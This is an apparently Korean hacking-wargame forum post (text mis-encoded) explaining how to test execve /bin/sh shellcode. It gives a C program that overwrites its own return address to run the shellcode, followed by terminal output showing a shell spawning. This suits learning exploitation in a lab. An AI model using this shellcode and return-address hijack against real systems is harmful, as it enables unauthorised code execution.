·¹º§ ÇØÅ·

 4, 1/1 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   randomkid
   pogusm´Ô ½©ÄÚµå Å×½ºÆ® ¹æ¹ýÀÔ´Ï´Ù.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2584 [º¹»ç]


EGGSHELL¿¡¼­ NOPÄڵ带 Á¦¿ÜÇÑ ½©Äڵ带 ÃßÃâÇÏ¿© ´ÙÀ½°ú °°ÀÌ ÇÁ·Î±×·¥À» ¸¸µì´Ï´Ù.

#include <stdio.h>

char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"; // <-- 16Áø ½©ÄÚµå.

int main()
{
        int *ret;

        ret = (int *)&ret + 2; // °íÀÇÀûÀ¸·Î ¸®ÅϾîµå·¹½º¸¦ °¡¸®Å°°Ô ÇÔ.

        *ret = (int)shellcode; // ¸®ÅϾîµå·¹½º¸¦ ½©ÄÚµåÁÖ¼Ò·Î º¯°æ.
}

ÀÌ·¸°Ô Å×½ºÆ®¸¦ Çغ¸½Ã¸é µË´Ï´Ù.

½ÇÁ¦ ÄÄÆÄÀÏ°ú ½ÇÇàÇÏ¸é ´ÙÀ½°ú °°ÀÌ µÇ¸é ¼º°øÀÔ´Ï´Ù.

[level1@ftz tmp]$ gcc -o test test.c
[level1@ftz tmp]$ ./test
sh-2.05b$

ÀÌ ¹æ¹ýÀº Ä¿³Î 2.4¿¡¼­¸¸ Å×½ºÆ®°¡ °¡´ÉÇÕ´Ï´Ù.

Ä¿³Î 2.6¿¡¼­´Â ´Ù¸¥¹æ¹ýÀ¸·Î ÇÏ¼Å¾ß ÇÕ´Ï´Ù.

Áñ°Å¿î ÇÏ·ç µÇ¼¼¿ä~
  Hit : 2168     Date : 2007/11/23 11:05


    
pogusm ÇÖ~ ¶Ç ÀÌ·¸°Ô ¾Ë·ÁÁֽôõ´Ï.. // ±Ùµ¥ ¿ä°Ç ¾Ë°íÀÖ´ø ³»¿ëÀÌ°í.... // Á¦°¡ ¾Ë°í ½Í¾ú´ø°Ç.. eggshell½ÇÇàÀ¸·Î ȯ°æº¯¼ö¿¡ ¿Ã¶ó°£ ½©Äڵ带 ±×³É ½ÇÇàÅ×½ºÆ® ÇÏ´Â ¹æ¹ýÀÌ 2007/11/23  
pogusm ±Ã±ÝÇß´ø °ÍÀ̾ú´Âµ¥.. ¤»¤» // ¾î·µç °¨»çÇÕ´Ï´Ù~ 2007/11/23  
  pogusm´Ô ½©ÄÚµå Å×½ºÆ® ¹æ¹ýÀÔ´Ï´Ù.[2]     randomkid
 11/23 2167
3     [re] level20 // ¸î°¡Áö Áú¹®Á» µå¸±²²¿ä..[3]     randomkid
 11/20 3129
2       pogusm´Ô ·¹º§ 20 Ç®ÀÌ ÀÔ´Ï´Ù.(retÁÖ¼Ò º¯°æ)[2]     randomkid
 11/21 3614
1             [re] ±×³ªÀú³ª, eggshellÀÌ µÆ´Ù ¾ÈµÆ´Ù ÇÏ´Â°Ç µµ´ëü ¿Ö ±×·±°ÅÁÒ?[1]     randomkid
 11/23 2071
1

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org